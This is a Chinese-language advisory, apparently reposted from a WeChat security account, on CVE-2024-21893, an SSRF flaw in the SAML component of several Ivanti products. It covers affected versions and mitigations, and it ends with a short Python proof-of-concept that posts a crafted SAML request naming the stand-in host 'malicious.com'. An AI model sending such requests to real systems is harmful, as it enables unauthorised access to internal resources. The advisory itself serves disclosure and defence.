CVE-2024-21893影响Ivanti产品

CVE-2024-21893漏洞在Ivanti Connect Secure、Ivanti Policy Secure及Ivanti Neurons for ZTA产品中的一个严重服务器端请求伪造（SSRF）漏洞。该漏洞允许攻击者在无需认证的情况下，访问某些受限资源。

CVE-2024-21893是Ivanti产品中的一个服务器端请求伪造（SSRF）漏洞，主要影响以下版本：

• Ivanti Connect Secure：版本 9.x 和 22.x

• Ivanti Policy Secure：版本 9.x 和 22.x

• Ivanti Neurons for ZTA：所有版本

该漏洞存在于SAML组件中，攻击者可以通过发送特制的请求，利用该漏洞在无需认证的情况下访问系统内的受限资源。

服务器端请求伪造（SSRF）漏洞允许攻击者通过受害服务器向内部或外部网络发起恶意请求，从而访问或操作本应受限的资源。在此漏洞中，Ivanti产品的SAML组件未能正确验证传入的SAML请求，导致攻击者能够发送特制的SAML请求以访问受限资源。

受到该漏洞影响的Ivanti产品包括但不限于：

• Ivanti Connect Secure 9.x和22.x版本

• Ivanti Policy Secure 9.x和22.x版本

• Ivanti Neurons for ZTA所有版本

这些产品广泛应用于企业和组织的网络安全防护中，任何未及时修补漏洞的系统都可能面临攻击风险。

1. 及时更新：Ivanti已经发布了相关的安全补丁，用户应立即更新到最新版本以修补该漏洞。请参阅Ivanti的官方公告和更新指南获取详细的更新步骤。

2. 配置调整：在应用补丁前，可临时通过限制SAML请求的来源IP和严格验证SAML请求来降低风险。

3. 监控和检测：实施全面的日志监控和流量分析，检测异常的SAML请求活动，及时发现和响应可能的攻击。

import requestsfrom urllib.parse import urlparsedef send_ssrf_poc(target_url):    payload = """<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" AssertionConsumerServiceURL="http://malicious.com/">                    <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://vulnerable.com</saml:Issuer>                 </samlp:AuthnRequest>"""    headers = {        "Content-Type": "text/xml",        "User-Agent": "Mozilla/5.0"    }    response = requests.post(target_url, data=payload, headers=headers, verify=False)    print(f"Sent PoC to {target_url}, response status: {response.status_code}")target_url = "http://target.com/saml"send_ssrf_poc(target_url)

原文始发于微信公众号（云梦安全）：CVE-2024-21893影响Ivanti产品